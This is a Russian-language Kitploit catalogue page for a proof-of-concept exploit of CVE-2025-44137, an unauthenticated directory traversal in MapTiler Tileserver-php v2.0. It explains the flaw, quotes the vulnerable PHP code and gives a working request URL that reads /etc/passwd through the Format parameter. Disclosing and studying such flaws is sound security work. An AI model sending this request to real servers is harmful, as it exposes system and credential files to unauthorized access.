Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-44137 — Эксплойт для подтверждения концепции для CVE-2025-44137: неаутентифицированный обход каталога в MapTiler Tileserver-php v2.0, позволяющий произвольное чтение файлов через специально созданные GET-параметры. | Kitploit
Инструменты/GitHubGitHub/mheranco/cve-2025-44137
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubmheranco/cve-2025-44137

CVE-2025-44137

Эксплойт для подтверждения концепции для CVE-2025-44137: неаутентифицированный обход каталога в MapTiler Tileserver-php v2.0, позволяющий произвольное чтение файлов через специально созданные GET-параметры.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-44137

Неавторизованное чтение файла в MapTiler Tileserver-php v2.0.

Описание

MapTiler Tileserver-php v2.0 уязвим для Directory Traversal. Функция renderTile в tileserver.php отвечает за доставку тайлов, хранящихся в виде файлов на сервере, по веб-запросам. При формировании пути к файлу допускается использование '../', что позволяет прочитать любой файл на веб-сервере. Затрагиваемые GET-параметры: "TileMatrix", "TileRow", "TileCol" и "Format".

https://github.com/maptiler/tileserver-php/blob/d0fdeaec69688dc500b652a23669d724d7d53df2/tileserver.php#L381-L398

root@kitploit:~
      $name = './' . $tileset . '/' . $z . '/' . $x . '/' . $y;
      $mime = 'image/';
      if($ext != null){
        $name .= '.' . $ext;
      }
      if ($fp = @fopen($name, 'rb')) {
        if($ext != null){
          $mime .= $ext;
        }else{
          //detect image type from file
          $mimetypes = ['gif', 'jpeg', 'png'];
          $mime .= $mimetypes[exif_imagetype($name) - 1];
        }
        header('Access-Control-Allow-Origin: *');
        header('Content-Type: ' . $mime);
        header('Content-Length: ' . filesize($name));
        fpassthru($fp);
        die;

PoC

http://localhost/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.

Screenshot 1 Screenshot 2

Авторы

Martin Herancourt

Скачать инструмент